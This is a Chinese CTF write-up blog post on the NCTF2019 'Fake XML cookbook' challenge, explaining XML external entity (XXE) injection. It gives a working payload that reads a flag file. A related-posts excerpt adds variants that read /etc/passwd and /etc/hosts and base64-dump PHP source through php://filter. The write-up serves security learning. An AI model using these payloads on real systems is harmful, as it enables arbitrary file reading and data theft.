[NCTF2019]Fake XML cookbook

最新推荐文章于 2025-03-30 12:02:56 发布

yjj哈哈哈

最新推荐文章于 2025-03-30 12:02:56 发布

阅读量152

点赞数

分类专栏： web

本文链接：https://blog.youkuaiyun.com/qq_43774856/article/details/110454545

版权

web 专栏收录该内容

19 篇文章

订阅专栏

[NCTF2019]Fake XML cookbook

打开链接，如图所示
在这里插入图片描述
尝试注入，无果

抓包进行分析

这里看到username和password都是xml格式，这里应该是xml实体注入。简要来讲就是客户端向服务器发送了XML数据，这个数据能被我们控制，这样我们就可以增加一个恶意的外部实体，实现攻击。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123</password></user>

得到flag
在这里插入图片描述

https://www.freebuf.com/vuls/175451.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

yjj哈哈哈

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[NCTF2019]Fake XML cookbook 1

shinygod的博客

03-13

2107

知识点：XML实体注入漏洞（XXE）原理：XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。详细了解查看源代码，访问doLogin.php 访问doLogin.php,提示加载外部xml实体 DOCTYPE（文档类型定义的声明） ENTITY（实体的声明） SYSTEM、PU

【学习笔记 46】 buu [NCTF2019]Fake XML cookbook

weixin_43553654的博客

08-03

458

0x00 知识点 XXE攻击 0x01 知识点详解什么是XXE攻击？答： XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。这里有一篇大佬的博客可以学习学习 0x02 解题思路

参与评论您还未登录，请先登录后发表或查看评论

[NCTF2019]Fake XML cookbook [XXE注入]

最新发布

2401_86190146的博客

03-30

484

构造payload，这样登录错误就会在<msg>里面显示用户名，但是用户名引用了XML外部实体，所以会显示file:///flag的内容。ENTITY xxe SYSTEM "file:///flag">]>定义外部实体的名字以及地址。一开始笨了吧唧的光在输入框里构造payload了，完全忘了还可以bp抓包，把<!ENTITY xxe SYSTEM "file:///flag">]>放到前面去，任意修改位置。会回显用户名，以用户名作为回显位，回显flag。

[ctf web]XXE通过DTD读取文件+XML和DTD基础语法（以[ctfshow]web_ak4观心和[NCTF2019]Fake XML cookbook为例）

ShenZ的博客

08-23

811

XML基础 XML文件可以分为三部分： XML声明 <?xml version ="1.0" encoding="UTF-8"?> DTD文档定义类型。文档元素 <foo><note category="COOKING"></note></foo> 根元素foo，子元素note，属性category XML语法 XML被设计为传输和存储数据基本语法： - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - X

XXE漏洞与CTF题目

m0_62725813的博客

12-09

786

典型的XXE攻击是由XML声明：<?DTD部分(通过特殊的命令去其他文件读取信息)SYSTEMXML部分组成危害：XXE 可以通过dtd去读取，访问其他文件或者网站，类似于ssrf">]> DTD部分</scan> XML部分scan标签设置一个test的实体，这个实体是通过system命令访问1.txt构造payload>//XML声明">]>

【xxe主看这个吧】xml --xxe 各种注入学习也就一些基本的方法，再加一个 xxe盲注，vps外带的

Zero_Adam的博客

04-10

499

目录：一、基础知识：二、注入方法：1. 直接通过DTD外部实体声明2. 通过DTD文档引入外部DTD文档，再引入外部实体声明3. 通过DTD外部实体声明引入外部实体声明三、产生的危害：1. 读取任意文件2. XXE无回显使用vps外带一、基础知识：基础看这篇就好二、注入方法： 1. 直接通过DTD外部实体声明内部实体声明，应该是无法触发xxe漏洞的，所以我们用的应该都是外部实体声明。也就是 SYSTEM 后面的东西都是外部的url的东西？。。不是呀，这个应该就不影响了，只是 system 后面的

[NCTF2019]True XML cookbook

02-14

### NCTF2019 True XML Challenge Solutions and Walkthrough In the context of the NCTF2019 competition, several challenges involved exploiting XXE (XML External Entity) vulnerabilities within XML documents to achieve various objectives such as file reading or server-side request forgery. #### Exploiting Basic XXE Vulnerability An example payload that demonstrates a basic XXE attack is shown below: ```xml <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/hosts"> ]> <user> <username>&admin;</username> <password>1</password> </user> ``` This payload attempts to read the contents of `/etc/hosts` by defining an external entity `admin`, which references this system file[^2]. #### Advanced File Reading with Different Protocols When direct access using the `file://` protocol does not work due to restrictions imposed by some parsers, alternative protocols can be used. For instance, PHP's filter wrapper allows for more sophisticated attacks where files are encoded before being sent back to the attacker: ```xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE xxe [ <!ENTITY xee SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php"> ]> <user> <username>&xee;</username> <password>123123</password> </user> ``` Here, instead of directly accessing the target file via its path, the content of `doLogin.php` gets base64-encoded through PHP’s filtering mechanism prior to transmission[^4]. #### Targeting Specific Files on Server For scenarios requiring specific sensitive information like flags stored somewhere accessible only internally, crafting payloads targeting these locations becomes crucial: ```xml <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user> <username>&admin;</username> <password>123456</password> </user> ``` The above code snippet aims at retrieving flag data located under root directory named 'flag'[^3]. #### General Approach Against Black Box Systems Even without detailed knowledge about internal structures, one could still attempt common paths known across many systems: ```xml <?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <user><username> &xxe; </username><password> 1 </password></user> ``` By referencing well-known Unix/Linux configuration files (`/etc/passwd`) in the entity definition, attackers may gain insights into underlying OS configurations even when no explicit details were provided initially[^5]. --related questions-- 1. How do different web application frameworks handle XML parsing differently? 2. What measures should developers take to prevent XXE attacks effectively? 3. Can you provide examples of real-world incidents caused by XXE vulnerabilities? 4. Are there any tools specifically designed for detecting XXE flaws during security audits? 5. In what ways has modern software development mitigated risks associated with XXE issues over time?